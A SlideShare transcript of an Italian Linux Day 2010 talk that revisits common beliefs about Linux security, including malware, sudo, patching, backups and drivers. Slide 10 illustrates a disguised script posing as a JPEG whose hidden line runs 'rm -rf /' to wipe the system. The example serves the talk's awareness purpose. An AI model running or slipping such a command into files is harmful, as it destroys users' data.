Your SlideShare is downloading. ×
Linux Day 2010: Linux Security Demystified
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Linux Day 2010: Linux Security Demystified

600
views

Published on

Rivisitiamo alcuni luoghi comuni relativi a Linux ed alla sicurezza

Rivisitiamo alcuni luoghi comuni relativi a Linux ed alla sicurezza

Published in: Technology, News & Politics

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
600
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
11
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Linux Security Demystified i luoghi comuni della sicurezza di Linux rivisitati ...un talk lisergico... Alessio L.R. Pennasilico mayhem@recursiva.org Linux Day 2010 Sabato 23 Ottobre 2010 1
  • 2. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 $ whois mayhem Board of Directors: Associazione Informatici Professionisti (AIP), Associazione Italiana Professionisti Sicurezza Informatica (AIPSI), CLUSIT, Italian Linux Society (ILS), LUGVR, Metro Olografix, Sikurezza.org Hackerʼs Profiling Project, CrISTAL 2 Security Evangelist @
  • 3. Alessio L.R. Pennasilico mayhem@recursiva.org Linux Day 2010 Linux è più sicuro: luogo comune o verità®? 3
  • 4. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Usare Linux è cool? 4
  • 5. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Repetita iuvant? Da anni ripetiamo sempre le stesse cose… sono ancora vere? 5
  • 6. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Una grande responsabilità... 6
  • 7. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Minacce Linux è vulnerabile ai virus? 7
  • 8. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Minacce Linux è vulnerabile al malware? 8
  • 9. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Malware Rootkit Backdoor Worm 9
  • 10. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 britney.spears.nuda.jpg.sh #<FF><D8><FF><E0>^@^PJFIF^@^A^B^@^@d^@d^@^@ #<FF><EC>^@^QDucky^@^A^@^D^@^@^@6^@^@ #<FF><EE>^@!Adobe^@d<C0>^@^@^@^A^C^@^P^C^C^F #^@^@)<9E>^@^@aE^@^@<96><81>^L<B6><B9><B0> #<FF><DB>^@<84>^@^G^E^E^E^F^E^G^F^F^G^K^G^F^G #^K^L^G^G^L^N^L^L^L^L^L^N^Q^D!d^K^B^D^H^P #<A4>UW<96><B2>{<F3>ESZ.^X<D7>A52|  000  @<81>   #bin/sh /bin/rm  -­‐rf  / #<FF><EC>^@^QDucky^@^A^@^D^@^@^@6^@^@ #<FF><EE>^@!Adobe^@d<C0>^@^@^@^A^C^@^P^C^C^F 10
  • 11. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 root / sudo con che credenziali lavoro? 11
  • 12. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Automount non è pericoloso come l’autoplay… ma... 12
  • 13. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Antivirus A cosa serve un antivirus per Linux? 13
  • 14. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Dubbio Linux come server è più sicuro? 14
  • 15. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Truth™ Potrebbe esserlo 15
  • 16. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Mi fido del mio sistema? 16
  • 17. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Marketing? 17
  • 18. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 In parte! 18
  • 19. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Vulnerability management 19 Window of Exposure Vulnerability Exploit Patch Applied Patch Critical Zone
  • 20. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Attack trends 20
  • 21. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Eliminare le vulnerabilità metto le patch? uso l’autoupdate? è un bene o un male? 21
  • 22. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Backup Salvo i dati? Con che frequenza? Salvo il sistema operativo, programmi e configurazioni? Prima di aggiornare? Dove e come? 22
  • 23. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Sicurezza fisica Riconfigurare un sistema dopo un boot da supporto alternativo è più semplice. Pro o contro? 23
  • 24. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Login, servizi ed opportunità 24
  • 25. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Eliminare le cose inutili... manco roba ghe manco se ne spaca mia nonna 25
  • 26. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Cosa disabilitare? 26
  • 27. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Dove stanno i cattivi? Mi preoccupo sia delle minacce interne che di quelle esterne? 27
  • 28. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Dubbio Linux è più stabile? 28
  • 29. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Dump… esiste! 29
  • 30. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Driver Uso driver di terze parti? Uso driver binari? 30
  • 31. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Quante partizioni compongono il mio file system? 31
  • 32. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 RAID ed il boot? meglio ridondare anche quello... 32
  • 33. Alessio L.R. Pennasilico mayhem@recursiva.org Linux Day 2010 Conclusioni 33
  • 34. Alessio L.R. Pennasilico mayhem@alba.st Linux Day 2010 Virtualizzare con Linux Linux può essere un sistema operativo estremamente sicuro Dipende da te! 34
  • 35. Domande? Alessio L.R. Pennasilico mayhem@recursiva.org Sabato 23 Ottobre 2010 Linux Day 2010 These slides are written by Alessio L.R. Pennasilico aka mayhem. They are subjected to C r e a t i v e C o m m o n s A t t r i b u t i o n - ShareAlike 2.5 version; you can copy, modify or sell them. “Please” cite your source and u s e t h e s a m e licence :) 35 Grazie per l'attenzione!
  • 36. Linux Security Demystified i luoghi comuni della sicurezza di Linux rivisitati ...un talk lisergico... Alessio L.R. Pennasilico mayhem@recursiva.org Linux Day 2010 Sabato 23 Ottobre 2010 36

×